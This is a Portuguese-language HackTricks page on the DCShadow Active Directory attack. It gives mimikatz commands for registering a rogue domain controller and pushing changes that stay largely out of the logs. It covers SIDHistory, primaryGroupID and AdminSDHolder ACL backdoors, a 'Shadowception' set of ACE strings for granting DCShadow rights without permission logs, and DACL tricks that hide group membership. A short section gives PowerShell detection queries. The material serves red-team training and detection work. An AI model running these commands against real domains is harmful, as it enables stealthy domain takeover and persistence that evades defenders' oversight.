DCShadow

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

Informações Básicas

Registra um novo Domain Controller no AD e o usa para push attributes (SIDHistory, SPNs…) em objetos especificados sem deixar quaisquer logs sobre as modificações. Você precisa de DA privilégios e deve estar dentro do root domain.
Observe que, se você usar dados incorretos, logs bem feios aparecerão.

Para realizar o ataque você precisa de 2 instâncias do mimikatz. Uma delas iniciará os servidores RPC com privilégios SYSTEM (você deve indicar aqui as mudanças que deseja executar), e a outra instância será usada para push the values:

!+
!processtoken
lsadump::dcshadow /object:username /attribute:Description /value="My new description"

lsadump::dcshadow /push

Observe que elevate::token não funcionará na sessão mimikatz1, pois isso elevava os privilégios da thread, mas precisamos elevar o privilégio do processo.
Você também pode selecionar um objeto “LDAP”: /object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local

Você pode enviar as alterações a partir de um DA ou de um usuário com as seguintes permissões mínimas:

  • No objeto de domínio:
  • DS-Install-Replica (Adicionar/Remover réplica no domínio)
  • DS-Replication-Manage-Topology (Gerenciar topologia de replicação)
  • DS-Replication-Synchronize (Sincronização de replicação)
  • O objeto Sites (e seus filhos) no Configuration container:
  • CreateChild and DeleteChild
  • O objeto do computador que está registrado como um DC:
  • WriteProperty (Not Write)
  • O objeto alvo:
  • WriteProperty (Not Write)

Você pode usar Set-DCShadowPermissions para conceder esses privilégios a um usuário sem privilégios (observe que isso deixará alguns logs). Isto é muito mais restritivo do que ter privilégios de DA.
Por exemplo: Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose Isso significa que o nome de usuário student1 quando conectado na máquina mcorp-student1 tem permissões de DCShadow sobre o objeto root1user.

Usando DCShadow para criar backdoors

lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-521-280534878-1496970234-700767426-519

lsadump::dcshadow /object:student1 /attribute:primaryGroupID /value:519

#First, get the ACE of an admin already in the Security Descriptor of AdminSDHolder: SY, BA, DA or -519
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=Admin SDHolder,CN=System,DC=moneycorp,DC=local")).psbase.Objec tSecurity.sddl
#Second, add to the ACE permissions to your user and push it using DCShadow
lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<whole modified ACL>

Abuso de grupo primário, lacunas de enumeração e detecção

  • primaryGroupID é um atributo separado da lista member do grupo. DCShadow/DSInternals podem escrevê-lo diretamente (ex.: setar primaryGroupID=512 para Domain Admins) sem a aplicação do LSASS no host, mas o AD ainda move o usuário: alterar o PGID sempre remove a associação do grupo primário anterior (mesmo comportamento para qualquer grupo alvo), portanto você não pode manter a associação ao antigo grupo primário.
  • Ferramentas padrão impedem remover um usuário do seu grupo primário atual (ADUC, Remove-ADGroupMember), então alterar o PGID normalmente requer gravações diretas no diretório (DCShadow/Set-ADDBPrimaryGroup).
  • Relatórios de associação são inconsistentes:
  • Inclui membros derivados do grupo primário: Get-ADGroupMember "Domain Admins", net group "Domain Admins", ADUC/Admin Center.
  • Omite membros derivados do grupo primário: Get-ADGroup "Domain Admins" -Properties member, ADSI Edit inspecionando member, Get-ADUser <user> -Properties memberOf.
  • Verificações recursivas podem não encontrar membros do grupo primário se o grupo primário estiver aninhado (p.ex., PGID do usuário aponta para um grupo aninhado dentro de Domain Admins); Get-ADGroupMember -Recursive ou filtros recursivos LDAP não retornarão esse usuário a menos que a recursão resolva explicitamente grupos primários.
  • Truques com DACL: atacantes podem deny ReadProperty em primaryGroupID no usuário (ou no atributo member do grupo para grupos não protegidos por AdminSDHolder), ocultando a associação efetiva da maioria das consultas PowerShell; net group ainda resolverá a associação. Grupos protegidos por AdminSDHolder irão resetar tais negações.

Detection/monitoring examples:

# Find users whose primary group is not the default Domain Users (RID 513)
Get-ADUser -Filter * -Properties primaryGroup,primaryGroupID |
Where-Object { $_.primaryGroupID -ne 513 } |
Select-Object Name,SamAccountName,primaryGroupID,primaryGroup

# Find users where primaryGroupID cannot be read (likely denied via DACL)
Get-ADUser -Filter * -Properties primaryGroupID |
Where-Object { -not $_.primaryGroupID } |
Select-Object Name,SamAccountName

Verifique grupos privilegiados comparando a saída de Get-ADGroupMember com Get-ADGroup -Properties member ou ADSI Edit para detectar discrepâncias introduzidas por primaryGroupID ou atributos ocultos.

Shadowception - Give DCShadow permissions using DCShadow (no modified permissions logs)

Precisamos acrescentar as seguintes ACEs com o SID do nosso usuário no final:

  • On the domain object:
  • (OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)
  • (OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)
  • (OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)
  • On the attacker computer object: (A;;WP;;;UserSID)
  • On the target user object: (A;;WP;;;UserSID)
  • On the Sites object in Configuration container: (A;CI;CCDC;;;UserSID)

Para obter a ACE atual de um objeto: (New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=loca l")).psbase.ObjectSecurity.sddl

Repare que, nesse caso, você precisa fazer várias alterações, não apenas uma. Portanto, na sessão mimikatz1 (RPC server) use o parâmetro /stack com cada alteração que quiser fazer. Dessa forma, você precisará apenas do /push uma vez para aplicar todas as alterações acumuladas no rouge server.

More information about DCShadow in ired.team.

Referências

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks